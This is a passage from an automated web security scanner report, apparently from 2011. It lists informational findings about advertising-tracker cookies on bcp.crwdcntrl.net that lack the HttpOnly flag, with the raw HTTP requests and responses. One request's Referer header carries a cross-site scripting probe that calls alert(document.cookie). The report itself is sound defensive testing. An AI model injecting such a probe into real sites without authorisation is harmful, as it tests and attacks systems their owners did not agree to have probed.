Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBsz8DAqG%2FlqneZQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAKdJPTM%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2P7%2F95jTDAyM%2BlauepdBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydsrQdSX24eBFDMDA%2B9PBr5fDDzKAg5MQKX%2Fv4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQUrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQDJArZm

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:38:29 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRDsysDAqG%2Fl6vaeQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAPGAPW0%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:29 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2PX%2F95ijDAyM%2Blaubu9BYgwczrJKLAwMZxkY%2FgPF3wApRgYGydsrQdSX24eBFDMDA99PBr5fDDzKAg5MQKX%2Fv4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQUrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQAz6rab; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:29 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.69. http://bcp.crwdcntrl.net/4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDkzMDAqG%2FlGH6aQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAMoBPVM%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyPn%2F99jjDAyM%2BlaO4adBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtrQdSX28eBFDMDA%2FtPBr5fDDzKAg5MQKX%2Ff4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQSrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQBrALb1

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:20 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRDkw8DAqG%2FlWMPHoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPADupPMQ%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:20 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOf%2F99h9DAyM%2BlaONXwgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAihmo6CcD3y8GHmUBByag0v%2B%2FwUqBFCMDUBWj0FZLuB6mnwzMvxiYhTZtQhZi%2BcXApJQ0E24kRBWTUrwXWGglXIhRaNMOZI2MYFUucFUgPgOXTJ06ficH8O7DryBwETN%2BBVytkwgoqG%2FAr4Dz8XL8CrgTdhFSsBO%2FAr6Kt%2FgVyJpdxK8AADqztl4%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:20 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.70. http://bcp.crwdcntrl.net/4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBkz8DAqG%2Fl6B7KoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPAEBwPMk%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyP7%2F99jTDAyM%2BlaO7qEgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAipmBgeUnA98vBh5lAQcmoNL%2Fv8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoJVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAABXLrZs

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:10 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRDkxMDAqG%2FlGHyWQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAMa5PVA%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:10 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOn%2F99gTDAyM%2BlaOwWdBYgwczrJKLAwMQM5%2FoPgbIMXIwCB5ey2I%2BnL7OJBiZmBg%2FcnA94uBR1nAgQmo9P9vsFIgxcgAVMUotNUSrofpJwPzLwZmoU2bkIVYfjEwKSXNhBsJUcWkFO8FFloJF2IU2rQDWSMjWJULXBWIz8AlU6eO38kBvPvwKwhcxIxfAVfrJAIK6hvwK%2BB8vBy%2FAu6EXYQU7MSvgK%2FiLX4FsmYX8SsAAGM%2BtvE%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:10 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.71. http://bcp.crwdcntrl.net/4/c=492%7Crand=622721104%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=622721104%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=622721104%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDkxMDAqG%2FlGHyWQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAMa5PVA%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOn%2F99gTDAyM%2BlaOwWdBYgwczrJKLAwMQM5%2FoPgbIMXIwCB5ey2I%2BnL7OJBiZmBg%2FcnA94uBR1nAgQmo9P9vsFIgxcgAVMUotNUSrofpJwPzLwZmoU2bkIVYfjEwKSXNhBsJUcWkFO8FFloJF2IU2rQDWSMjWJULXBWIz8AlU6eO38kBvPvwKwhcxIxfAVfrJAIK6hvwK%2BB8vBy%2FAu6EXYQU7MSvgK%2FiLX4FsmYX8SsAAGM%2BtvE%3D

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:10 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRDkxMDAqG%2FlGKrFoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPACSOPK8%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:10 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOn%2F99gTDAyM%2BlaOoVogMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAipmBge0nA98vBh5lAQcmoNL%2Fv8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoJVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAAghrZR; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:10 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.72. http://bcp.crwdcntrl.net/4/c=492%7Crand=624837915%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=624837915%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=624837915%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRC0loGBUd%2FK6dspBnUGBgGlBoYGoHgvmOK5DKZEt4Epwa9gipcZIncTIrcfIigN4S2EUIsgSvggvCwGEOB6DOGlQ6hECJUApvj%2Fgik2XjDFYQSmhM3AFNcMsHY%2BUYgGYTAlcg6ipBpMCRyHmOIGpoSeQZwbAeEVQ%2FQdgvBKIC57D9GuD3H8PwhlCtF3AOJcfyAPAOu1Plw%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgaO3%2F77GxDAyM%2BlZO306BxBg4nGWVWBgYzjIw%2FAeKvwFSjAwMkrfXgKgvt48BKWYGBu6fDHy%2FGHiUBRyYgEr%2F%2FwIrBVKMDEBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChFXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgCYn7d6

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:38:16 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRBswcDAqG%2FlKsrBoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPALT0PEg%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:16 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2OL%2F95hLDAyM%2BlauohwgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O2VIOrL7cNAipmBgecnA98vBh5lAQcmoNL%2F38FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoKVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAD7RrWB; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:16 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.73. http://bcp.crwdcntrl.net/4/c=492%7Crand=708673296%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=708673296%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=708673296%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=408799&1ae67'-alert(document.cookie)-'3ecbfdbef18=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDsysDAqG%2Fl6vaeQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAPGAPW0%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2PX%2F95ijDAyM%2Blaubu9BYgwczrJKLAwMZxkY%2FgPF3wApRgYGydsrQdSX24eBFDMDA99PBr5fDDzKAg5MQKX%2Fv4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQUrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQAz6rab

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:39:45 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRA8kYGBUd%2FKraCbQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAP0hPYA%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:39:45 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgeOL%2F7zGVDAyM%2BlZuBd0gMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0VIOrL7UNAipmBgf8nA98vBh5lAQcmoNL%2F38BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoCVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAACnk7ZF; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:39:45 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.74. http://bcp.crwdcntrl.net/4/c=492%7Crand=759762185%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=759762185%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=759762185%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwnX7lEQMDo76k%2BGR5BlUGBgElBimgMEMvmBLdBqZ4LoMpwa9gipcZIngTomQ%2FRFAawlsIoRZBlPCBKa7HYEpMBCKXDqESIVQCmOL%2FC6bYeMEUhxGYEjYDuYSBTxSiUhhMiZwDUwLHIUqqwUqEnkFMcYO4MwJMCRVD9B2C8EogTnoP1sD7D6JdH8IzhbjTH0gBABTHG0A%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Dv9yqP%2F%2F29rMDAw6kuKT5YHiTGwO8sqMTEwSP5%2F9p%2BRgeELAwOQAvJ5%2FjPwKSXNRBZi%2Bs%2FALLTVkhGmGCjEDBLatAlZCKiKRWjTDjQhRqV4F5BZ%2Fx8BhYAMJqV4LzgfqIQRaBADl0ydOrpTAnj3oQsFLmJGF%2BJqnYQhVN%2BALsSdsAtdiPPxckxVO9GF%2BCreogvJml1EFwIA1uVxiQ%3D%3D

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:29:33 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRCoy8DAqG9lK8XCoM7AIKCk4scGFO8FUzyXwZToNjAl%2BBVM8TJD5G5C5PZDBKUhvIUQahFECR%2BEl8UAAlyPIbx0CJUIoRLAFP9fMMXGC6Y4jMCUsJmKCZDimgHWzicK0SAMpkTOQZRUg5UIHIeY4gamhJ5BnBsB4RVD9B2C8EogLnsP1iesD6Z4%2F0H8YArRdwDiXH8gDwAzsiis; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:29:33 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgUPf%2F97i7DAyM%2Bla2UiwgMQYOZ1klIOssA8N%2FoPgbIMXIwCB5exOI%2BnL7DJBiBor%2FZOD7xcCjLODAhKYUqIpRaKslXA%2FTTwbmXwzMQps2IQux%2FGJgUkqaCTcSoopJKd4LLLQOLsQotGkHskZGsCoXuCoQn4FLpk4dv5MDePfhVxC4iBm%2FAq7WSQQU1DfgV8D5eDl%2BBdwJuwgp2IlfAV%2FFW%2FwKZM0u4lcAAMEusn8%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:29:33 GMT; Path=/
Set-Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; Domain=.crwdcntrl.net; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 326

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div><iframe src='http://bcp.crwdcntrl.ne
...[SNIP]...
6.75. http://bcp.crwdcntrl.net/4/c=492%7Crand=769353744%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=769353744%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=769353744%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDkxMDAqG%2FlGKrFoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPACSOPK8%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOn%2F99gTDAyM%2BlaOoVogMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAipmBge0nA98vBh5lAQcmoNL%2Fv8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoJVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAAghrZR

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:11 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
